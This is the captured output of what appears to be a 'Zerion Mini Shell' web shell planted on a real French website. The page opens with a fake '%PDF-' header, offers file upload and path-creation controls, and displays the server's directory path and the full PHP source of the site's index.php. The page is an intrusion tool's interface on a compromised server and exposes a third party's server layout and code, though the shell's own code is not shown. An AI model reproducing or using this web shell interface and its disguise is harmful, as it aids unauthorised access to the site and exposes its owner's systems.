%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/alliance/domains/sedl.alnetis.fr/public_html/
Upload File :
Create Path :
Current File : /home/alliance/domains/sedl.alnetis.fr/public_html/index.php

<?php
include_once("inc/config.php");
include_once("inc/functions.php");
include_once("inc/init.php");
if(!isset($_SESSION['edition_front'])){
	$uneedition=$edition->getCurrentEdition("front",$lang->getlangid(),false);
	$_SESSION['edition_front']=$uneedition['id'];
}


$acc = true;

//affichage du html
include("theme/html.php");
//affichage des metas
include("theme/meta.php");
echo "\n<title>Accueil - ".$info_titresite."</title>\n";
//affichage du header
include("theme/header.php");
//colonne de droite
include("theme/droite.php");
$liste_pays=$pays->getPays($lang->getlangid());
$liste_pays=$pays->getDrapeauEdition($this_edition['id'],$lang->getlangid());
?>
<div class="themeedition vertback padding2 mt10">
	<h1><strong><?=$admtext->getText("theme",$lang->getlangid())?> <?=dateAnnee($this_edition['date_debut'])?> :</strong> <?=$this_edition['titre']?></h1>
</div>
<div class="themeedition blanc padding mt10">
	<?=html_entity_decode($this_edition['texte'],ENT_QUOTES, 'UTF-8')?>
</div>
<div class="liste_pays flexcontent">
<?
foreach ($liste_pays as $unpays):?>
	<a href="<?=$lang->getlang()?>/<?=$unpays['id'];?>-pays.html<?=$getedition?>" class="pays">
	<div class="padding2">
		<img src="images/icons/<?=strtolower($unpays['code_iso']);?>.png" alt="<?=$unpays['name'];?>"/>
		<div class="nom"><?=$unpays['name'];?></div>
	</div>
	</a>
<?endforeach;?>
</div>

<div style="clear:both"></div>

<?
//affichage du footer
include("theme/footer.php");

?>

Zerion Mini Shell 1.0